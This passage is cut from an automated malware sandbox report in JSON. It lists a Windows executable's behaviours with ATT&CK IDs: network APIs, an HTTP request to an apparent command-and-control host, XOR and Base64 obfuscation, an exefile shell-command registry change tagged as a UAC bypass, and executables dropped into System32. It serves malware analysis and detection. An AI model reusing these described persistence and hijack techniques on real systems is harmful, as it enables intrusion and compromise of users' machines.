reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"HttpQueryInfoA\" (Indicator: \"HttpQueryInfo\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"WSASend\" (Indicator: \"WSASend\"; Source: \"00000000-00005204-00000C29-4238884475\")\n Found reference to API \"WSARecv\" (Indicator: \"WSARecv\"; Source: \"00000000-00005204-00000C29-4238885281\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"HttpSendRequestA\" (Indicator: \"HttpSendRequest\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"HttpQueryInfoA\" (Indicator: \"HttpQueryInfo\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-241", "type": 2, "relevance": 1, "name": "Contains ability to download a file from a URL (API string)", "description": "Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"URLDownloadToCacheFileA\" (Indicator: \"URLDownload\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"URLDownloadToCacheFileA\" (Indicator: \"URLDownload\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-538", "type": 2, "relevance": 1, "name": "Contains ability to create a HTTP or FTP session (API string)", "description": "Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "\"<IPv4>\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-457", "type": 2, "relevance": 1, "name": "Found string related to HTTP headers", "description": "Found string \"HTTP/1.1\" (Indicator: \"HTTP/1.1\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found string \"GET /article.php?id=103822 HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp\")\n Found string \"T /article.php?id=103822 HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp, 00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"rundll32.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005204)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-169", "type": 2, "relevance": 1, "name": "Found mail related domain names", "description": "Observed email domain:\"pop3.163.com\" [Source: 5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d]\n Observed email domain:\"pop3.163.com\" [Source: 00000000-00005204.00000000.334618.0040C000.00000080.mdmp]\n Observed email domain:\"ten.sdapop.evres\" [Source: 00000000-00005204.00000001.334759.002D0000.00000004.mdmp]\n Observed email domain:\"www.gmx.net\" [Source: 00000000-00005204.00000001.334759.002D0000.00000004.mdmp]", "origin": "File/Memory", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-143", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a new HTTP request", "description": "\"rundll32.exe\" called \"HttpOpenRequestW\" with parameter HTTP method:\"GET\" object: /article.php?id=103822\" - (UID: 00000000-00005204)", "origin": "API Call", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-62", "type": 7, "relevance": 1, "name": "Communicates with HTTP webserver (GET/POST requests)", "description": "Found http requests in header \"GET /article.php?id=103822\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-199", "type": 6, "relevance": 1, "name": "Calls an API used to connect to internet", "description": "\"rundll32.exe\" called \"InternetOpenA with parameter Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\" (UID: 00000000-00005204)\n \"rundll32.exe\" called \"InternetOpenW with parameter Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729;\" (UID: 00000000-00005204)", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "network-60", "type": 7, "relevance": 1, "name": "HTTP requests contain Base64 strings", "description": "Contains base64 string in header \"/article\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"Encoding\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"gzip\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"MSIE\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"NET4\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"InfoPath\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"Host\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /article.php?id=103822 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)Host: www.zigui.orgConnection: Keep-Alive\"", "origin": "Network Traffic", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "stream-139", "type": 1, "name": "Contains XOR operation loops [Stream disassembly]", "description": "Assembly shows XOR instruction xor byte ptr [3F9073B7h]\n ch in Stream UID: 13525-89-0040A570", "origin": "Hybrid Analysis Technology", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: Contains ability to perform Base64 encoding/decoding\n Matched sigs: HTTP requests contain Base64 strings\n Matched sigs: Contains XOR operation loops [Stream disassembly]", "origin": "Indicator Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Contains CRYPTO related strings\n Matched sigs: Contains ability to perform Base64 encoding/decoding\n Matched sigs: HTTP requests contain Base64 strings\n Matched sigs: Reads the cryptographic machine GUID\n Matched sigs: Contains XOR operation loops [Stream disassembly]", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-31", "type": 15, "relevance": 1, "name": "Shows ability to use encryption for command and control traffic", "description": "The analysis shows use of encryption\n use of http/https that can be used to send encrypted data on command and control server. Matched sigs: Contains XOR operation loops [Stream disassembly]\n Matched sigs: Contains ability to create a new HTTP request (API string)\n Matched sigs: Found potential URL in binary/memory\n Matched sigs: Found potential URLs in memory dumps\n Matched sigs: Contains ability to communicate with network (API string)\n Matched sigs: Contains ability to create a HTTP or FTP session (API string)\n Matched sigs: Found potential IP address in binary/memory\n Matched sigs: Calls an API typically used to create a HTTP or FTP session\n Matched sigs: Calls an API typically used to create a new HTTP request\n Matched sigs: Contacts server\n Matched sigs: Contacts domains\n Matched sigs: Spawned process connects to a network", "origin": "Indicator Combinations", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-426", "type": 2, "relevance": 1, "name": "Contains ability to modify file attributes (API string)", "description": "Found reference to API \"SetFileAttributesA\" (Indicator: \"SetFileAttributes\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"SetFileAttributesA\" (Indicator: \"SetFileAttributes\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-230", "type": 2, "relevance": 1, "name": "Contains ability to delete registry key/value (API string)", "description": "Found reference to API \"RegDeleteKeyA\" (Indicator: \"RegDeleteKey\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"RegDeleteValueA\" (Indicator: \"RegDeleteValue\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"RegDeleteKeyA\" (Indicator: \"RegDeleteKey\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")\n Found reference to API \"RegDeleteValueA\" (Indicator: \"RegDeleteValue\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\Device\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\" (Indicator: \"\\Device\\\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp\")\n Found string \"\\Device\\{90A066FE-591C-47F3-850D-9644B684FBA5}\" (Indicator: \"\\Device\\\"; Source: \"00000000-00005204.00000000.334618.002D0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-342", "type": 2, "relevance": 1, "name": "Contains reference to Hijacked CLSID(s)", "description": "Observed string: \"CLSID\\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\" (Indicator: \"{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\") in Source: 00000000-00005204.00000001.334759.002D0000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-308", "type": 2, "relevance": 1, "name": "Contains ability to delete files/directories (API string)", "description": "Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-159", "type": 3, "relevance": 1, "name": "Modifies windows command shell related registry path (UAC Bypass)", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"\"%1\" %*\"), \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"A200AB0020002200250031002200200025002A000000\"), \"rundll32.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"A200AB0020002200250031002200200025002A000000\")", "origin": "Registry Access", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"rundll32.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "Remote Access Related", "identifier": "string-531", "type": 2, "relevance": 1, "name": "Contains references to RPC protocol sequence strings", "description": "Found string \"9ncalrpc:[epmapper,Security=Impersonation Dynamic False]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"I+ncalrpc:[OLE477F9CE2506C4B489358F95AC093]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"+ncalrpc:[OLEF8357BB74C5244DF8E71475E6DF0]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"+ncalrpc:[OLE477F9CE2506C4B489358F95AC093]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")\n Found string \"+ncalrpc:[OLED4B5BEC9ABD742A1A7DD67549B2B]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00005204.00000001.334759.002D0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\" claimed CRC 79767 while the actual is CRC 135755\n \"_.exe\" claimed CRC 79767 while the actual is CRC 155916\n \"notepad_.exe\" claimed CRC 79767 while the actual is CRC 145856\n \"RUNDLL32.EXE.67A47BFB.bin\" claimed CRC 79767 while the actual is CRC 98718", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "RegDeleteKeyA\n RegCloseKey\n RegDeleteValueA\n RegCreateKeyExA\n RegOpenKeyExA\n GetFileAttributesA\n GetTickCount\n GetVersionExA\n GetModuleFileNameA\n LoadLibraryA\n WinExec\n GetStartupInfoA\n OpenProcess\n CreateDirectoryA\n DeleteFileA\n ReadProcessMemory\n GetCommandLineA\n GetProcAddress\n GetTempPathA\n GetModuleHandleA\n GetTempFileNameA\n GetSystemDirectoryA\n TerminateProcess\n Sleep\n ShellExecuteA\n FindWindowA\n GetWindowThreadProcessId\n FindWindowExA\n HttpSendRequestA\n InternetCloseHandle\n InternetOpenA\n InternetReadFile\n InternetConnectA\n HttpQueryInfoA\n socket\n recv\n send\n WSAStartup\n connect\n closesocket", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" wrote 4096 bytes starting with PE header signature to file \"C:\\Windows\\System32\\¢«.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" wrote 4096 bytes starting with PE header signature to file \"C:\\Windows\\System32\\notepad¢¬.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" wrote 4096 bytes starting with PE header signature to file \"C:\\Windows\\system\\rundll32.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"_.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"notepad_.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"RUNDLL32.EXE.67A47BFB.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"rundll32.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\system\\rundll32.exe]- [targetUID: 00000000-00005204]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00000892)\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00000892)\n 